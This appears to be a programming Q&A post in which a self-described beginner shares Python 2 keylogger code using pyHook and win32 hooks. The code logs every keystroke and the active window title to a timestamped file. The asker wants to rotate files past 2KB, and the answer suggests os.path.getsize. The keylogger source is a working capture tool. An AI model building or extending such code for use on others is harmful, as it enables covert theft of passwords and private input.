# Using own code in pyhook pumpmessages

Tags: python, file, keylogger, pyhook

i want to check if the file in which i am writing the keys is more than 2Kb . If it is more than 2KB then i need to make another file and stop writing in this one. I am a beginer in python please help me this. Please indicate where can i use the code for checking if file is more than 2kb.

```
import win32api , win32console , win32gui , pythoncom , pyHook , sys, time ,os
import datetime 
now = datetime.datetime.now()
p = now.strftime("%Y-%m-%d %H-%M")
temp_path =  p
fil = temp_path + '.txt'
sys.stdout = open(fil,'w')
lastWindow = None
lastWindow=win32gui.GetWindowText (win32gui.GetForegroundWindow())
while True:
    def OnKeyboardEvent(event):
        global lastWindow
        window = event.WindowName
        key = chr(event.Ascii)
        if window != lastWindow:
            print window 
            lastWindow = window
        print key
    hm = pyHook.HookManager()

    hm.KeyDown = OnKeyboardEvent

    hm.HookKeyboard()
    pythoncom.PumpMessages()
```

Hope you can help

Answer (score 1):

you could use `.getsize`.

```
>>> import os
>>> b = os.path.getsize("/path/isa_005.mp3")
>>> b
2071611L
```